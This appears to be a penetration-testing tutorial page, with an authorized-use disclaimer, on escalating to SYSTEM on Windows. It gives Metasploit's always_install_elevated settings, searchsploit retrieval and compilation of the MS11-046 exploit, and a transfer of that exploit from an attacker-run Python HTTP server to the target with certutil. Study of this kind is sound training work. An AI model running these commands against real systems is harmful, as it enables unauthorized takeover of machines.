Skip to content
Disclaimer: This material is provided for educational purposes and authorized security testing only. You are solely responsible for how you use the information. Do not use these techniques on systems without explicit permission from the owner. We do not encourage any kind of illegal or harmful activity

Exploiting with Metasploit

  1. We discovered that the target is potentially vulnerable to the following kernel vulnerabilities:

    Note: exploit/windows/local/always_install_elevated enables privilege escalation by abusing the AlwaysInstallElevated policy on Windows systems.

  2. For this exploit, set the LHOST, LPORT, and SESSION fields.

    • SESSION should be the active Meterpreter session (e.g., 1).
    • LPORT must be different from the port used in the initial session (1338 in this case). 
    use exploit/windows/local/always_install_elevated
set SESSION 1
set LHOST [IP-ADDRESS]
set LPORT [PORT]
run

  3. Run the exploit to obtain a SYSTEM shell.

Exploiting with Windows Exploit Suggester

  1. Using Windows Exploit Suggester, we identified that the target is potentially vulnerable to several kernel exploits:
    python3 wes.py systeminfo.txt -i 'Elevation of Privilege' --exploits-only

  2. Download and compile an exploit using searchsploit: 

    searchsploit 40564
searchsploit -m windows_x86/local/40564.c
x86_64-w64-mingw32-gcc 40564.c -o ms11-046.exe -lws2_32

  3. Alternatively, search for a pre-compiled version of the exploit.

    Note: Be cautious with pre-compiled executables as they may contain backdoors. Always use trusted sources.

  4. Example: MS11-046 pre-compiled exploit.

  5. To download, click the Raw link for the executable.

  6. Transfer the exploit to the target machine (see File Transfer section for techniques). Example using a Python HTTP server:

    python3 -m http.server 8000

  7. Execute the exploit on the target and confirm successful privilege escalation. Example using certutil:

    certutil -urlcache -f http://[IP-ADDRESS]:8000/ms11-046.exe ms11-046.exe